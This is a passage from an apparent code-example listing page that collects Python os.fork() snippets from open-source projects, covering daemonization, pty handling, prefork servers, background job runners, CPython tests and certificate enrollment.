        raise OSError("os.openpty() failed")

    pid = os.fork()
    if pid == CHILD:
        # Child.
        os.close(parent_fd)
        pty_make_controlling_tty(child_fd)

        os.dup2(child_fd, STDIN_FILENO)
        os.dup2(child_fd, STDOUT_FILENO)
        os.dup2(child_fd, STDERR_FILENO)

    else:
        # Parent.
        os.close(child_fd)

    return pid, parent_fd 
Example 49
Project: Repobot   Author: Desgard   File: _fork_pty.py    MIT License 5 votes vote down vote up
def pty_make_controlling_tty(tty_fd):
    '''This makes the pseudo-terminal the controlling tty. This should be
    more portable than the pty.fork() function. Specifically, this should
    work on Solaris. '''

    child_name = os.ttyname(tty_fd)

    # Disconnect from controlling tty, if any.  Raises OSError of ENXIO
    # if there was no controlling tty to begin with, such as when
    # executed by a cron(1) job.
    try:
        fd = os.open("/dev/tty", os.O_RDWR | os.O_NOCTTY)
        os.close(fd)
    except OSError as err:
        if err.errno != errno.ENXIO:
            raise

    os.setsid()

    # Verify we are disconnected from controlling tty by attempting to open
    # it again.  We expect that OSError of ENXIO should always be raised.
    try:
        fd = os.open("/dev/tty", os.O_RDWR | os.O_NOCTTY)
        os.close(fd)
        raise ExceptionPexpect("OSError of errno.ENXIO should be raised.")
    except OSError as err:
        if err.errno != errno.ENXIO:
            raise

    # Verify we can open child pty.
    fd = os.open(child_name, os.O_RDWR)
    os.close(fd)

    # Verify we now have a controlling tty.
    fd = os.open("/dev/tty", os.O_WRONLY)
    os.close(fd) 
Example 50
Project: ssrspeed_backup   Author: mazhenting   File: daemon.py    GNU General Public License v3.0 5 votes vote down vote up
def daemon_start(pid_file, log_file):

    def handle_exit(signum, _):
        if signum == signal.SIGTERM:
            sys.exit(0)
        sys.exit(1)

    signal.signal(signal.SIGINT, handle_exit)
    signal.signal(signal.SIGTERM, handle_exit)

    # fork only once because we are sure parent will exit
    pid = os.fork()
    assert pid != -1

    if pid > 0:
        # parent waits for its child
        time.sleep(5)
        sys.exit(0)

    # child signals its parent to exit
    ppid = os.getppid()
    pid = os.getpid()
    if write_pid_file(pid_file, pid) != 0:
        os.kill(ppid, signal.SIGINT)
        sys.exit(1)

    os.setsid()
    signal.signal(signal.SIG_IGN, signal.SIGHUP)

    print('started')
    os.kill(ppid, signal.SIGTERM)

    sys.stdin.close()
    try:
        freopen(log_file, 'a', sys.stdout)
        freopen(log_file, 'a', sys.stderr)
    except IOError as e:
        shell.print_exception(e)
        sys.exit(1) 
Example 51
Project: cb4   Author: joint-online-judge   File: server.py    GNU Affero General Public License v3.0 5 votes vote down vote up
def main():
  if not options.syslog:
    coloredlogs.install(level=logging.DEBUG if options.debug else logging.INFO,
                        fmt='[%(levelname).1s %(asctime)s %(module)s:%(lineno)d] %(message)s',
                        datefmt='%y%m%d %H:%M:%S')
  else:
    syslog.enable_system_logging(level=logging.DEBUG if options.debug else logging.INFO,
                                 fmt='vj4[%(process)d] %(programname)s %(levelname).1s %(message)s')
  logging.getLogger('sockjs').setLevel(logging.WARNING)
  url = urllib.parse.urlparse(options.listen)
  if url.scheme == 'http':
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
    host, port_str = url.netloc.rsplit(':', 1)
    sock.bind((host, int(port_str)))
  elif url.scheme == 'unix':
    sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    try:
      os.remove(url.path)
    except FileNotFoundError:
      pass
    sock.bind(url.path)
  else:
    _logger.error('Invalid listening scheme %s', url.scheme)
    return 1
  for i in range(1, options.prefork):
    pid = os.fork()
    if not pid:
      break
    else:
      atexit.register(lambda: os.kill(pid, signal.SIGTERM))
  web.run_app(app.Application(), sock=sock, access_log=None, shutdown_timeout=0) 
Example 52
Project: shadowsocksr   Author: dsmnoi   File: daemon.py    Apache License 2.0 5 votes vote down vote up
def daemon_start(pid_file, log_file):

    def handle_exit(signum, _):
        if signum == signal.SIGTERM:
            sys.exit(0)
        sys.exit(1)

    signal.signal(signal.SIGINT, handle_exit)
    signal.signal(signal.SIGTERM, handle_exit)

    # fork only once because we are sure parent will exit
    pid = os.fork()
    assert pid != -1

    if pid > 0:
        # parent waits for its child
        time.sleep(5)
        sys.exit(0)

    # child signals its parent to exit
    ppid = os.getppid()
    pid = os.getpid()
    if write_pid_file(pid_file, pid) != 0:
        os.kill(ppid, signal.SIGINT)
        sys.exit(1)

    os.setsid()
    signal.signal(signal.SIG_IGN, signal.SIGHUP)

    print('started')
    os.kill(ppid, signal.SIGTERM)

    sys.stdin.close()
    try:
        freopen(log_file, 'a', sys.stdout)
        freopen(log_file, 'a', sys.stderr)
    except IOError as e:
        shell.print_exception(e)
        sys.exit(1) 
Example 53
Project: chattR   Author: patrickstocklin   File: daemonize.py    GNU General Public License v2.0 5 votes vote down vote up
def become_daemon(our_home_dir='.', out_log='/dev/null',
                      err_log='/dev/null', umask=0o022):
        "Robustly turn into a UNIX daemon, running in our_home_dir."
        # First fork
        try:
            if os.fork() > 0:
                sys.exit(0)     # kill off parent
        except OSError as e:
            sys.stderr.write("fork #1 failed: (%d) %s\n" % (e.errno, e.strerror))
            sys.exit(1)
        os.setsid()
        os.chdir(our_home_dir)
        os.umask(umask)

        # Second fork
        try:
            if os.fork() > 0:
                os._exit(0)
        except OSError as e:
            sys.stderr.write("fork #2 failed: (%d) %s\n" % (e.errno, e.strerror))
            os._exit(1)

        si = open('/dev/null', 'r')
        so = open(out_log, 'a+', buffering)
        se = open(err_log, 'a+', buffering)
        os.dup2(si.fileno(), sys.stdin.fileno())
        os.dup2(so.fileno(), sys.stdout.fileno())
        os.dup2(se.fileno(), sys.stderr.fileno())
        # Set custom file descriptors so that they get proper buffering.
        sys.stdout, sys.stderr = so, se 
Example 54
Project: restrain-jit   Author: thautwarm   File: utils.py    MIT License 5 votes vote down vote up
def exec_cc(cmd, args):
    """
    Execute with current context.
    Yes, you're right -- I'm naming it after call/cc.

    Return a generator.
        The first yielded one is the status of
        the execution of subprocess command.

        The following ones are the the buffer batches of stderr,
        each of which is a Python 'bytes' object
    """
    file = cmd
    err_in, err_out = os.pipe()
    out_in, out_out = os.pipe()
    if os.fork():
        _, status = os.wait()
        os.close(err_out)
        os.close(out_out)
        yield status
        while True:
            load = os.read(err_in, 1024)
            if not load:
                break
            yield load
    else:
        # for child process
        os.close(err_in)
        os.close(out_in)
        os.dup2(err_out, sys.stderr.fileno())
        os.dup2(out_out, sys.stdout.fileno())

        os.execvpe(file, [cmd, *args], dict(os.environ))
        # in case that os.execvp fails
        sys.exit(127) 
Example 55
Project: docker-ssr-client   Author: storezhang   File: daemon.py    Apache License 2.0 5 votes vote down vote up
def daemon_start(pid_file, log_file):

    def handle_exit(signum, _):
        if signum == signal.SIGTERM:
            sys.exit(0)
        sys.exit(1)

    signal.signal(signal.SIGINT, handle_exit)
    signal.signal(signal.SIGTERM, handle_exit)

    # fork only once because we are sure parent will exit
    pid = os.fork()
    assert pid != -1

    if pid > 0:
        # parent waits for its child
        time.sleep(5)
        sys.exit(0)

    # child signals its parent to exit
    ppid = os.getppid()
    pid = os.getpid()
    if write_pid_file(pid_file, pid) != 0:
        os.kill(ppid, signal.SIGINT)
        sys.exit(1)

    os.setsid()
    signal.signal(signal.SIG_IGN, signal.SIGHUP)

    print('started')
    os.kill(ppid, signal.SIGTERM)

    sys.stdin.close()
    try:
        freopen(log_file, 'a', sys.stdout)
        freopen(log_file, 'a', sys.stderr)
    except IOError as e:
        shell.print_exception(e)
        sys.exit(1) 
Example 56
Project: PythonRpcCode   Author: mtianyan   File: multiprocess.py    Apache License 2.0 5 votes vote down vote up
def loop(sock, handlers):
    while True:
        conn, addr = sock.accept()
        pid = os.fork()  # 好戏在这里,创建子进程处理新连接
        if pid < 0:  # fork error
            return
        if pid > 0:  # parent process
            conn.close()  # 关闭父进程的客户端套接字
            continue
        if pid == 0:
            sock.close()  # 关闭子进程的服务器套接字
            handle_conn(conn, addr, handlers)
            break  # 处理完后一定要退出循环,不然子进程也会继续去accept连接 
Example 57
Project: PythonRpcCode   Author: mtianyan   File: async_prefork.py    Apache License 2.0 5 votes vote down vote up
def prefork(self, n):
        for i in range(n):
            pid = os.fork()
            if pid < 0:  # fork error
                return
            if pid > 0:  # parent process
                continue
            if pid == 0:
                break  # child process 
Example 58
Project: PythonRpcCode   Author: mtianyan   File: server.py    Apache License 2.0 5 votes vote down vote up
def prefork(self, n):
        for i in range(n):
            pid = os.fork()
            if pid < 0:  # fork error
                raise
            if pid > 0:  # parent process
                self.child_pids.append(pid)
                continue
            if pid == 0:
                return False  # child process
        return True 
Example 59
Project: alfred-yubikey-otp   Author: robertoriv   File: background.py    MIT License 4 votes vote down vote up
def _background(pidfile, stdin='/dev/null', stdout='/dev/null',
                stderr='/dev/null'):  # pragma: no cover
    """Fork the current process into a background daemon.

    :param pidfile: file to write PID of daemon process to.
    :type pidfile: filepath
    :param stdin: where to read input
    :type stdin: filepath
    :param stdout: where to write stdout output
    :type stdout: filepath
    :param stderr: where to write stderr output
    :type stderr: filepath

    """
    def _fork_and_exit_parent(errmsg, wait=False, write=False):
        try:
            pid = os.fork()
            if pid > 0:
                if write:  # write PID of child process to `pidfile`
                    tmp = pidfile + '.tmp'
                    with open(tmp, 'wb') as fp:
                        fp.write(str(pid))
                    os.rename(tmp, pidfile)
                if wait:  # wait for child process to exit
                    os.waitpid(pid, 0)
                os._exit(0)
        except OSError as err:
            _log().critical('%s: (%d) %s', errmsg, err.errno, err.strerror)
            raise err

    # Do first fork and wait for second fork to finish.
    _fork_and_exit_parent('fork #1 failed', wait=True)

    # Decouple from parent environment.
    os.chdir(wf().workflowdir)
    os.setsid()

    # Do second fork and write PID to pidfile.
    _fork_and_exit_parent('fork #2 failed', write=True)

    # Now I am a daemon!
    # Redirect standard file descriptors.
    si = open(stdin, 'r', 0)
    so = open(stdout, 'a+', 0)
    se = open(stderr, 'a+', 0)
    if hasattr(sys.stdin, 'fileno'):
        os.dup2(si.fileno(), sys.stdin.fileno())
    if hasattr(sys.stdout, 'fileno'):
        os.dup2(so.fileno(), sys.stdout.fileno())
    if hasattr(sys.stderr, 'fileno'):
        os.dup2(se.fileno(), sys.stderr.fileno()) 
Example 60
Project: alfred-yubikey-otp   Author: robertoriv   File: background.py    MIT License 4 votes vote down vote up
def run_in_background(name, args, **kwargs):
    r"""Cache arguments then call this script again via :func:`subprocess.call`.

    :param name: name of job
    :type name: unicode
    :param args: arguments passed as first argument to :func:`subprocess.call`
    :param \**kwargs: keyword arguments to :func:`subprocess.call`
    :returns: exit code of sub-process
    :rtype: int

    When you call this function, it caches its arguments and then calls
    ``background.py`` in a subprocess. The Python subprocess will load the
    cached arguments, fork into the background, and then run the command you
    specified.

    This function will return as soon as the ``background.py`` subprocess has
    forked, returning the exit code of *that* process (i.e. not of the command
    you're trying to run).

    If that process fails, an error will be written to the log file.

    If a process is already running under the same name, this function will
    return immediately and will not run the specified command.

    """
    if is_running(name):
        _log().info('[%s] job already running', name)
        return

    argcache = _arg_cache(name)

    # Cache arguments
    with open(argcache, 'wb') as fp:
        pickle.dump({'args': args, 'kwargs': kwargs}, fp)
        _log().debug('[%s] command cached: %s', name, argcache)

    # Call this script
    cmd = ['/usr/bin/python', __file__, name]
    _log().debug('[%s] passing job to background runner: %r', name, cmd)
    retcode = subprocess.call(cmd)

    if retcode:  # pragma: no cover
        _log().error('[%s] background runner failed with %d', name, retcode)
    else:
        _log().debug('[%s] background job started', name)

    return retcode 
Example 61
Project: alfred-yubikey-otp   Author: robertoriv   File: background.py    MIT License 4 votes vote down vote up
def main(wf):  # pragma: no cover
    """Run command in a background process.

    Load cached arguments, fork into background, then call
    :meth:`subprocess.call` with cached arguments.

    """
    log = wf.logger
    name = wf.args[0]
    argcache = _arg_cache(name)
    if not os.path.exists(argcache):
        msg = '[{0}] command cache not found: {1}'.format(name, argcache)
        log.critical(msg)
        raise IOError(msg)

    # Fork to background and run command
    pidfile = _pid_file(name)
    _background(pidfile)

    # Load cached arguments
    with open(argcache, 'rb') as fp:
        data = pickle.load(fp)

    # Cached arguments
    args = data['args']
    kwargs = data['kwargs']

    # Delete argument cache file
    os.unlink(argcache)

    try:
        # Run the command
        log.debug('[%s] running command: %r', name, args)

        retcode = subprocess.call(args, **kwargs)

        if retcode:
            log.error('[%s] command failed with status %d', name, retcode)
    finally:
        os.unlink(pidfile)

    log.debug('[%s] job complete', name) 
Example 62
Project: pyblish-win   Author: pyblish   File: pty.py    GNU Lesser General Public License v3.0 4 votes vote down vote up
def fork():
    """fork() -> (pid, master_fd)
    Fork and make the child a session leader with a controlling terminal."""

    try:
        pid, fd = os.forkpty()
    except (AttributeError, OSError):
        pass
    else:
        if pid == CHILD:
            try:
                os.setsid()
            except OSError:
                # os.forkpty() already set us session leader
                pass
        return pid, fd

    master_fd, slave_fd = openpty()
    pid = os.fork()
    if pid == CHILD:
        # Establish a new session.
        os.setsid()
        os.close(master_fd)

        # Slave becomes stdin/stdout/stderr of child.
        os.dup2(slave_fd, STDIN_FILENO)
        os.dup2(slave_fd, STDOUT_FILENO)
        os.dup2(slave_fd, STDERR_FILENO)
        if (slave_fd > STDERR_FILENO):
            os.close (slave_fd)

        # Explicitly open the tty to make it become a controlling tty.
        tmp_fd = os.open(os.ttyname(STDOUT_FILENO), os.O_RDWR)
        os.close(tmp_fd)
    else:
        os.close(slave_fd)

    # Parent and child process.
    return pid, master_fd 
Example 63
Project: pyblish-win   Author: pyblish   File: spawn.py    GNU Lesser General Public License v3.0 4 votes vote down vote up
def _spawn_posix(cmd, search_path=1, verbose=0, dry_run=0):
    log.info(' '.join(cmd))
    if dry_run:
        return
    executable = cmd[0]
    exec_fn = search_path and os.execvp or os.execv
    env = None
    if sys.platform == 'darwin':
        global _cfg_target, _cfg_target_split
        if _cfg_target is None:
            _cfg_target = sysconfig.get_config_var(
                                  'MACOSX_DEPLOYMENT_TARGET') or ''
            if _cfg_target:
                _cfg_target_split = [int(x) for x in _cfg_target.split('.')]
        if _cfg_target:
            # ensure that the deployment target of build process is not less
            # than that used when the interpreter was built. This ensures
            # extension modules are built with correct compatibility values
            cur_target = os.environ.get('MACOSX_DEPLOYMENT_TARGET', _cfg_target)
            if _cfg_target_split > [int(x) for x in cur_target.split('.')]:
                my_msg = ('$MACOSX_DEPLOYMENT_TARGET mismatch: '
                          'now "%s" but "%s" during configure'
                                % (cur_target, _cfg_target))
                raise DistutilsPlatformError(my_msg)
            env = dict(os.environ,
                       MACOSX_DEPLOYMENT_TARGET=cur_target)
            exec_fn = search_path and os.execvpe or os.execve
    pid = os.fork()

    if pid == 0:  # in the child
        try:
            if env is None:
                exec_fn(executable, cmd)
            else:
                exec_fn(executable, cmd, env)
        except OSError, e:
            if not DEBUG:
                cmd = executable
            sys.stderr.write("unable to execute %r: %s\n" %
                             (cmd, e.strerror))
            os._exit(1)

        if not DEBUG:
            cmd = executable
        sys.stderr.write("unable to execute %r for unknown reasons" % cmd)
        os._exit(1) 
Example 64
Project: pyblish-win   Author: pyblish   File: test_signal.py    GNU Lesser General Public License v3.0 4 votes vote down vote up
def readpipe_interrupted(self):
        """Perform a read during which a signal will arrive.  Return True if the
        read is interrupted by the signal and raises an exception.  Return False
        if it returns normally.
        """
        # Create a pipe that can be used for the read.  Also clean it up
        # when the test is over, since nothing else will (but see below for
        # the write end).
        r, w = os.pipe()
        self.addCleanup(os.close, r)

        # Create another process which can send a signal to this one to try
        # to interrupt the read.
        ppid = os.getpid()
        pid = os.fork()

        if pid == 0:
            # Child code: sleep to give the parent enough time to enter the
            # read() call (there's a race here, but it's really tricky to
            # eliminate it); then signal the parent process.  Also, sleep
            # again to make it likely that the signal is delivered to the
            # parent process before the child exits.  If the child exits
            # first, the write end of the pipe will be closed and the test
            # is invalid.
            try:
                time.sleep(0.2)
                os.kill(ppid, self.signum)
                time.sleep(0.2)
            finally:
                # No matter what, just exit as fast as possible now.
                exit_subprocess()
        else:
            # Parent code.
            # Make sure the child is eventually reaped, else it'll be a
            # zombie for the rest of the test suite run.
            self.addCleanup(os.waitpid, pid, 0)

            # Close the write end of the pipe.  The child has a copy, so
            # it's not really closed until the child exits.  We need it to
            # close when the child exits so that in the non-interrupt case
            # the read eventually completes, otherwise we could just close
            # it *after* the test.
            os.close(w)

            # Try the read and report whether it is interrupted or not to
            # the caller.
            try:
                d = os.read(r, 1)
                return False
            except OSError, err:
                if err.errno != errno.EINTR:
                    raise
                return True 
Example 65
Project: pyblish-win   Author: pyblish   File: test_threading.py    GNU Lesser General Public License v3.0 4 votes vote down vote up
def test_5_clear_waiter_locks_to_avoid_crash(self):
        # Check that a spawned thread that forks doesn't segfault on certain
        # platforms, namely OS X.  This used to happen if there was a waiter
        # lock in the thread's condition variable's waiters list.  Even though
        # we know the lock will be held across the fork, it is not safe to
        # release locks held across forks on all platforms, so releasing the
        # waiter lock caused a segfault on OS X.  Furthermore, since locks on
        # OS X are (as of this writing) implemented with a mutex + condition
        # variable instead of a semaphore, while we know that the Python-level
        # lock will be acquired, we can't know if the internal mutex will be
        # acquired at the time of the fork.

        script = """if True:
            import os, time, threading

            start_fork = False

            def worker():
                # Wait until the main thread has attempted to join this thread
                # before continuing.
                while not start_fork:
                    time.sleep(0.01)
                childpid = os.fork()
                if childpid != 0:
                    # Parent process just waits for child.
                    (cpid, rc) = os.waitpid(childpid, 0)
                    assert cpid == childpid
                    assert rc == 0
                    print('end of worker thread')
                else:
                    # Child process should just return.
                    pass

            w = threading.Thread(target=worker)

            # Stub out the private condition variable's _release_save method.
            # This releases the condition's lock and flips the global that
            # causes the worker to fork.  At this point, the problematic waiter
            # lock has been acquired once by the waiter and has been put onto
            # the waiters list.
            condition = w._block
            orig_release_save = condition._release_save
            def my_release_save():
                global start_fork
                orig_release_save()
                # Waiter lock held here, condition lock released.
                start_fork = True
            condition._release_save = my_release_save

            w.start()
            w.join()
            print('end of main thread')
            """
        output = "end of worker thread\nend of main thread\n"
        self.assertScriptHasOutput(script, output) 
Example 66
Project: wechat-alfred-workflow   Author: TKkk-iOSer   File: background.py    MIT License 4 votes vote down vote up
def _background(pidfile, stdin='/dev/null', stdout='/dev/null',
                stderr='/dev/null'):  # pragma: no cover
    """Fork the current process into a background daemon.

    :param pidfile: file to write PID of daemon process to.
    :type pidfile: filepath
    :param stdin: where to read input
    :type stdin: filepath
    :param stdout: where to write stdout output
    :type stdout: filepath
    :param stderr: where to write stderr output
    :type stderr: filepath

    """
    def _fork_and_exit_parent(errmsg, wait=False, write=False):
        try:
            pid = os.fork()
            if pid > 0:
                if write:  # write PID of child process to `pidfile`
                    tmp = pidfile + '.tmp'
                    with open(tmp, 'wb') as fp:
                        fp.write(str(pid))
                    os.rename(tmp, pidfile)
                if wait:  # wait for child process to exit
                    os.waitpid(pid, 0)
                os._exit(0)
        except OSError as err:
            _log().critical('%s: (%d) %s', errmsg, err.errno, err.strerror)
            raise err

    # Do first fork and wait for second fork to finish.
    _fork_and_exit_parent('fork #1 failed', wait=True)

    # Decouple from parent environment.
    os.chdir(wf().workflowdir)
    os.setsid()

    # Do second fork and write PID to pidfile.
    _fork_and_exit_parent('fork #2 failed', write=True)

    # Now I am a daemon!
    # Redirect standard file descriptors.
    si = open(stdin, 'r', 0)
    so = open(stdout, 'a+', 0)
    se = open(stderr, 'a+', 0)
    if hasattr(sys.stdin, 'fileno'):
        os.dup2(si.fileno(), sys.stdin.fileno())
    if hasattr(sys.stdout, 'fileno'):
        os.dup2(so.fileno(), sys.stdout.fileno())
    if hasattr(sys.stderr, 'fileno'):
        os.dup2(se.fileno(), sys.stderr.fileno()) 
Example 67
Project: wechat-alfred-workflow   Author: TKkk-iOSer   File: background.py    MIT License 4 votes vote down vote up
def run_in_background(name, args, **kwargs):
    r"""Cache arguments then call this script again via :func:`subprocess.call`.

    :param name: name of job
    :type name: unicode
    :param args: arguments passed as first argument to :func:`subprocess.call`
    :param \**kwargs: keyword arguments to :func:`subprocess.call`
    :returns: exit code of sub-process
    :rtype: int

    When you call this function, it caches its arguments and then calls
    ``background.py`` in a subprocess. The Python subprocess will load the
    cached arguments, fork into the background, and then run the command you
    specified.

    This function will return as soon as the ``background.py`` subprocess has
    forked, returning the exit code of *that* process (i.e. not of the command
    you're trying to run).

    If that process fails, an error will be written to the log file.

    If a process is already running under the same name, this function will
    return immediately and will not run the specified command.

    """
    if is_running(name):
        _log().info('[%s] job already running', name)
        return

    argcache = _arg_cache(name)

    # Cache arguments
    with open(argcache, 'wb') as fp:
        pickle.dump({'args': args, 'kwargs': kwargs}, fp)
        _log().debug('[%s] command cached: %s', name, argcache)

    # Call this script
    cmd = ['/usr/bin/python', __file__, name]
    _log().debug('[%s] passing job to background runner: %r', name, cmd)
    retcode = subprocess.call(cmd)

    if retcode:  # pragma: no cover
        _log().error('[%s] background runner failed with %d', name, retcode)
    else:
        _log().debug('[%s] background job started', name)

    return retcode 
Example 68
Project: wechat-alfred-workflow   Author: TKkk-iOSer   File: background.py    MIT License 4 votes vote down vote up
def main(wf):  # pragma: no cover
    """Run command in a background process.

    Load cached arguments, fork into background, then call
    :meth:`subprocess.call` with cached arguments.

    """
    log = wf.logger
    name = wf.args[0]
    argcache = _arg_cache(name)
    if not os.path.exists(argcache):
        msg = '[{0}] command cache not found: {1}'.format(name, argcache)
        log.critical(msg)
        raise IOError(msg)

    # Fork to background and run command
    pidfile = _pid_file(name)
    _background(pidfile)

    # Load cached arguments
    with open(argcache, 'rb') as fp:
        data = pickle.load(fp)

    # Cached arguments
    args = data['args']
    kwargs = data['kwargs']

    # Delete argument cache file
    os.unlink(argcache)

    try:
        # Run the command
        log.debug('[%s] running command: %r', name, args)

        retcode = subprocess.call(args, **kwargs)

        if retcode:
            log.error('[%s] command failed with status %d', name, retcode)
    finally:
        os.unlink(pidfile)

    log.debug('[%s] job complete', name) 
Example 69
Project: alfred-urban-dictionary   Author: xilopaint   File: background.py    MIT License 4 votes vote down vote up
def _background(pidfile, stdin='/dev/null', stdout='/dev/null',
                stderr='/dev/null'):  # pragma: no cover
    """Fork the current process into a background daemon.

    :param pidfile: file to write PID of daemon process to.
    :type pidfile: filepath
    :param stdin: where to read input
    :type stdin: filepath
    :param stdout: where to write stdout output
    :type stdout: filepath
    :param stderr: where to write stderr output
    :type stderr: filepath

    """
    def _fork_and_exit_parent(errmsg, wait=False, write=False):
        try:
            pid = os.fork()
            if pid > 0:
                if write:  # write PID of child process to `pidfile`
                    tmp = pidfile + '.tmp'
                    with open(tmp, 'wb') as fp:
                        fp.write(str(pid))
                    os.rename(tmp, pidfile)
                if wait:  # wait for child process to exit
                    os.waitpid(pid, 0)
                os._exit(0)
        except OSError as err:
            _log().critical('%s: (%d) %s', errmsg, err.errno, err.strerror)
            raise err

    # Do first fork and wait for second fork to finish.
    _fork_and_exit_parent('fork #1 failed', wait=True)

    # Decouple from parent environment.
    os.chdir(wf().workflowdir)
    os.setsid()

    # Do second fork and write PID to pidfile.
    _fork_and_exit_parent('fork #2 failed', write=True)

    # Now I am a daemon!
    # Redirect standard file descriptors.
    si = open(stdin, 'r', 0)
    so = open(stdout, 'a+', 0)
    se = open(stderr, 'a+', 0)
    if hasattr(sys.stdin, 'fileno'):
        os.dup2(si.fileno(), sys.stdin.fileno())
    if hasattr(sys.stdout, 'fileno'):
        os.dup2(so.fileno(), sys.stdout.fileno())
    if hasattr(sys.stderr, 'fileno'):
        os.dup2(se.fileno(), sys.stderr.fileno()) 
Example 70
Project: alfred-urban-dictionary   Author: xilopaint   File: background.py    MIT License 4 votes vote down vote up
def run_in_background(name, args, **kwargs):
    r"""Cache arguments then call this script again via :func:`subprocess.call`.

    :param name: name of job
    :type name: unicode
    :param args: arguments passed as first argument to :func:`subprocess.call`
    :param \**kwargs: keyword arguments to :func:`subprocess.call`
    :returns: exit code of sub-process
    :rtype: int

    When you call this function, it caches its arguments and then calls
    ``background.py`` in a subprocess. The Python subprocess will load the
    cached arguments, fork into the background, and then run the command you
    specified.

    This function will return as soon as the ``background.py`` subprocess has
    forked, returning the exit code of *that* process (i.e. not of the command
    you're trying to run).

    If that process fails, an error will be written to the log file.

    If a process is already running under the same name, this function will
    return immediately and will not run the specified command.

    """
    if is_running(name):
        _log().info('[%s] job already running', name)
        return

    argcache = _arg_cache(name)

    # Cache arguments
    with open(argcache, 'wb') as fp:
        pickle.dump({'args': args, 'kwargs': kwargs}, fp)
        _log().debug('[%s] command cached: %s', name, argcache)

    # Call this script
    cmd = ['/usr/bin/python', __file__, name]
    _log().debug('[%s] passing job to background runner: %r', name, cmd)
    retcode = subprocess.call(cmd)

    if retcode:  # pragma: no cover
        _log().error('[%s] background runner failed with %d', name, retcode)
    else:
        _log().debug('[%s] background job started', name)

    return retcode 
Example 71
Project: alfred-urban-dictionary   Author: xilopaint   File: background.py    MIT License 4 votes vote down vote up
def main(wf):  # pragma: no cover
    """Run command in a background process.

    Load cached arguments, fork into background, then call
    :meth:`subprocess.call` with cached arguments.

    """
    log = wf.logger
    name = wf.args[0]
    argcache = _arg_cache(name)
    if not os.path.exists(argcache):
        msg = '[{0}] command cache not found: {1}'.format(name, argcache)
        log.critical(msg)
        raise IOError(msg)

    # Fork to background and run command
    pidfile = _pid_file(name)
    _background(pidfile)

    # Load cached arguments
    with open(argcache, 'rb') as fp:
        data = pickle.load(fp)

    # Cached arguments
    args = data['args']
    kwargs = data['kwargs']

    # Delete argument cache file
    os.unlink(argcache)

    try:
        # Run the command
        log.debug('[%s] running command: %r', name, args)

        retcode = subprocess.call(args, **kwargs)

        if retcode:
            log.error('[%s] command failed with status %d', name, retcode)
    finally:
        os.unlink(pidfile)

    log.debug('[%s] job complete', name) 
Example 72
Project: efre-lod-elasticsearch-tools   Author: slub   File: es2json.py    Apache License 2.0 4 votes vote down vote up
def daemonize(self):
        """
        do the UNIX double-fork magic, see Stevens' "Advanced 
        Programming in the UNIX Environment" for details (ISBN 0201563177)
        http://www.erlenstar.demon.co.uk/unix/faq_2.html#SEC16
        """
        try: 
            pid = os.fork() 
            if pid > 0:
                # exit first parent
                sys.exit(0) 
        except OSError as e: 
            sys.stderr.write("fork #1 failed: %d (%s)\n" % (e.errno, e.strerror))
            sys.exit(1)

        # decouple from parent environment
        os.chdir("/") 
        os.setsid() 
        os.umask(0) 

        # do second fork
        try: 
            pid = os.fork() 
            if pid > 0:
                # exit from second parent
                sys.exit(0) 
        except OSError as e: 
            sys.stderr.write("fork #2 failed: %d (%s)\n" % (e.errno, e.strerror))
            sys.exit(1) 
    
        # redirect standard file descriptors
        sys.stdout.flush()
        sys.stderr.flush()
        si = open(self.stdin, 'r')
        so = open(self.stdout, 'a+')
        se = open(self.stderr, 'a+')
        os.dup2(si.fileno(), sys.stdin.fileno())
        os.dup2(so.fileno(), sys.stdout.fileno())
        os.dup2(se.fileno(), sys.stderr.fileno())

        # write pidfile
        atexit.register(self.delpid)
        pid = str(os.getpid())
        with open(self.pidfile,'w+') as pf:
            pf.write("%s\n" % pid) 
Example 73
Project: certidude   Author: laurivosandi   File: authority.py    MIT License 4 votes vote down vote up
def self_enroll(skip_notify=False):
    assert os.getuid() == 0 and os.getgid() == 0, "Can self-enroll only as root"

    from certidude import const, config
    common_name = const.FQDN
    os.umask(0o0177)

    try:
        path, buf, cert, signed, expires = get_signed(common_name)
        self_public_key = asymmetric.load_public_key(path)
        private_key = asymmetric.load_private_key(config.SELF_KEY_PATH)
    except FileNotFoundError: # certificate or private key not found
        click.echo("Generating private key for frontend: %s" % config.SELF_KEY_PATH)
        with open(config.SELF_KEY_PATH, 'wb') as fh:
            if public_key.algorithm == "ec":
                self_public_key, private_key = asymmetric.generate_pair("ec", curve=public_key.curve)
            elif public_key.algorithm == "rsa":
                self_public_key, private_key = asymmetric.generate_pair("rsa", bit_size=public_key.bit_size)
            else:
                raise NotImplemented("CA certificate public key algorithm %s not supported" % public_key.algorithm)
            fh.write(asymmetric.dump_private_key(private_key, None))
    else:
        now = datetime.utcnow()
        if now + timedelta(days=1) < expires:
            click.echo("Certificate %s still valid, delete to self-enroll again" % path)
            return

    builder = CSRBuilder({"common_name": common_name}, self_public_key)
    request = builder.build(private_key)
    pid = os.fork()
    if not pid:
        from certidude import authority, config
        from certidude.common import drop_privileges
        drop_privileges()
        assert os.getuid() != 0 and os.getgid() != 0
        path = os.path.join(config.REQUESTS_DIR, common_name + ".pem")
        click.echo("Writing certificate signing request for frontend: %s" % path)
        with open(path, "wb") as fh:
            fh.write(pem_armor_csr(request)) # Write CSR with certidude permissions
        authority.sign(common_name, skip_notify=skip_notify, skip_push=True, overwrite=True, profile=config.PROFILES["srv"])
        click.echo("Frontend certificate signed")
        sys.exit(0)
    else:
        os.waitpid(pid, 0)
        os.system("systemctl reload nginx") 
Example 74
Project: certidude   Author: laurivosandi   File: cli.py    MIT License 4 votes vote down vote up
def certidude_serve(fork):
    from certidude import const, push, config
    click.echo("Using configuration from: %s" % const.SERVER_CONFIG_PATH)
    click.echo("SCEP subnets: %s" % config.SCEP_SUBNETS)
    click.echo("Loading signature profiles:")
    for profile in config.PROFILES.values():
         click.echo("- %s" % profile)
    click.echo()

    click.echo("Users subnets: %s" %
        ", ".join([str(j) for j in config.USER_SUBNETS]))
    click.echo("Administrative subnets: %s" %
        ", ".join([str(j) for j in config.ADMIN_SUBNETS]))
    click.echo("Auto-sign enabled for following subnets: %s" %
        ", ".join([str(j) for j in config.AUTOSIGN_SUBNETS]))
    click.echo("Request submissions allowed from following subnets: %s" %
        ", ".join([str(j) for j in config.REQUEST_SUBNETS]))

    from certidude.api import ReadWriteApp, BuilderApp, ResponderApp, RevocationListApp, LogApp

    if not fork or not os.fork():
        pid = os.getpid()
        with open(const.SERVER_PID_PATH, "w") as pidfile:
